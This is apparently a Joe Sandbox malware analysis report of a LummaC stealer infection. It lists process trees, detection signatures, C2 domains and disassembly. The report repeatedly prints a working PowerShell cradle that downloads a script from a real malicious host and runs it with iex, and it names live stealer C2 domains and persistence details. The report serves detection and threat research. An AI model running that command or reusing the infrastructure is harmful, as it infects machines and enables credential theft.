Edit tour

Windows Analysis Report
http://google.com

Overview

General Information

Sample URL:	http://google.com
Analysis ID:	1519588
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Powershell drops PE file

Powershell uses Background Intelligent Transfer Service (BITS)

Sample uses string decryption to hide its real strings

Sigma detected: PowerShell Download and Execution Cradles

Suspicious powershell command line found

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,8122544170802490295,15874759390953772630,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://google.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 7980 cmdline: "C:\Windows\system32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8056 cmdline: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text MD5: 04029E121A0CFA5991749937DD22A1D9)

PrivacyDrive.exe (PID: 4252 cmdline: "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe" MD5: 80C2A36E9A14E3EDBA0B706D2433D9B8)

WerFault.exe (PID: 2216 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1188 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 3284 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1736 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["covvercilverow.shop", "priooozekw.shop", "pumpkinkwquo.shop", "surroundeocw.shop", "deallyharvenw.shop", "abortinoiwiam.shop", "racedsuitreow.shop", "candleduseiwo.shop", "defenddsouneuw.shop"], "Build id": "yJEcaG--rui1222"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x5ad2f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, CommandLine: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7980, ParentProcessName: cmd.exe, ProcessCommandLine: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, ProcessId: 8056, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8056, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RATU0Beb

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8056, TargetFilename: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, CommandLine: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7980, ParentProcessName: cmd.exe, ProcessCommandLine: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, ProcessId: 8056, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, CommandLine: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7980, ParentProcessName: cmd.exe, ProcessCommandLine: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, ProcessId: 8056, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:55:57.520109+0200	2054653	1	A Network Trojan was detected	192.168.2.16	49829	172.67.206.221	443	TCP
2024-09-26T17:55:59.006250+0200	2054653	1	A Network Trojan was detected	192.168.2.16	49830	172.67.206.221	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:55:57.520109+0200	2049836	1	A Network Trojan was detected	192.168.2.16	49829	172.67.206.221	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:55:59.006250+0200	2049812	1	A Network Trojan was detected	192.168.2.16	49830	172.67.206.221	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:55:57.151423+0200	2056079	1	Domain Observed Used for C2 Detected	192.168.2.16	49829	172.67.206.221	443	TCP
2024-09-26T17:55:58.577607+0200	2056079	1	Domain Observed Used for C2 Detected	192.168.2.16	49830	172.67.206.221	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:55:56.640051+0200	2056078	1	Domain Observed Used for C2 Detected	192.168.2.16	53987	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: abortinoiwiam.shop	Avira URL Cloud: Label: malware
Source: defenddsouneuw.shop	Avira URL Cloud: Label: malware
Source: priooozekw.shop	Avira URL Cloud: Label: malware
Source: surroundeocw.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/u	Avira URL Cloud: Label: malware
Source: candleduseiwo.shop	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il222.zip	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/	Avira URL Cloud: Label: malware
Source: racedsuitreow.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api9	Avira URL Cloud: Label: malware
Source: covvercilverow.shop	Avira URL Cloud: Label: malware
Source: pumpkinkwquo.shop	Avira URL Cloud: Label: malware
Source: deallyharvenw.shop	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il2.txt	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: PrivacyDrive.exe.4252.16.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["covvercilverow.shop", "priooozekw.shop", "pumpkinkwquo.shop", "surroundeocw.shop", "deallyharvenw.shop", "abortinoiwiam.shop", "racedsuitreow.shop", "candleduseiwo.shop", "defenddsouneuw.shop"], "Build id": "yJEcaG--rui1222"}

Sample uses string decryption to hide its real strings

Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: covvercilverow.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: surroundeocw.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: abortinoiwiam.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: pumpkinkwquo.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: priooozekw.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: deallyharvenw.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: defenddsouneuw.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: racedsuitreow.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: candleduseiwo.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: yJEcaG--rui1222

Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.85.254:443 -> 192.168.2.16:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.16:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.213.254:443 -> 192.168.2.16:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.16:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.16:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.16:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49834 version: TLS 1.2

Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000010.00000003.1510267405.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000000.1435518072.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe.15.dr
Source:	Binary string: _.nDb=_.J("VOy8xe");_.oDb=_.J("s2IYHc");_.pDb=_.J("ucVTnf");_.qDb=_.J("pU3PWb"); source: chromecache_242.1.dr, chromecache_193.1.dr
Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000010.00000003.1510267405.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000000.1435518072.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe.15.dr
Source:	Binary string: _.KDb=function(){var a=_.Jv;if(a.ka!==null)return a.ka;if(document.body){var b=_.Ql.N7(document.body).top;return a.ka=b}return 0};_.Jv=new _.Iv;_.Kv=function(a){_.Jv.WZa(a)};_.LDb=function(){return _.Jv.getScrollTop()};_.Lv=function(a,b){_.Jv.fixedUiScrollTo(a,b)};NDb=navigator.userAgent.match(/ GSA\/([.\d]+)/);MDb=NDb?NDb[1]:"";_.ODb=_.Vb&&_.pa(MDb,"4")>=0;_.PDb=_.Vb&&_.pa(MDb,"5.2")>=0;_.QDb=_.Vb&&_.pa(MDb,"4.3")>=0&&!(_.pa(MDb,"4.5")>=0); source: chromecache_242.1.dr, chromecache_193.1.dr

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	16_2_047E2403
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	16_2_047D74E1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	16_2_04800432
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, 0000000Bh	16_2_047F54B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	16_2_047CF4B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_047EF577
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	16_2_047F45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_047F45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_047F45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	16_2_047E25AE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	16_2_047E8582
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	16_2_047ED652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	16_2_047ED652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	16_2_0480B612
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	16_2_047DF6C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	16_2_047C66B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_047EA692
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	16_2_047F076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	16_2_047F076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	16_2_047C7712
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_047D6013
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_047D600C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	16_2_047ED0CE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	16_2_047ED134
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	16_2_047E2132
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	16_2_047D11B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_0480C2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_048082BB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_047F4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_047F4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_048012FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	16_2_048012FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_047F429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_047F429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	16_2_04805272
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	16_2_047FC282
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_0480B3B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	16_2_047E8312
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	16_2_048063F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_047D539E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	16_2_047D4DDD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	16_2_047F1DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_04808D52
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	16_2_047E9DA7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	16_2_0480BD62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	16_2_047E5D92
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	16_2_0480BED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_047F4E2D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_047F4E18
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	16_2_047F0E11
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	16_2_04800EF0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	16_2_047CBEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	16_2_047CBEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_04804E22
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	16_2_047F3ED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	16_2_047EFEC1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	16_2_047F3F33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_0480BFE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	16_2_047F3EB7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then push ebx	16_2_047DF835
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_04809832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	16_2_04809832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	16_2_047D58A8
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	16_2_047DC952
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	16_2_047D2911
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_047D59AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	16_2_047D59AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	16_2_047D7AF3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	16_2_047C8B72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_047F4B4C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	16_2_0480BBE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	16_2_04802B02
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp eax	16_2_047D7BF4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	16_2_04800B62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	16_2_047E0B95
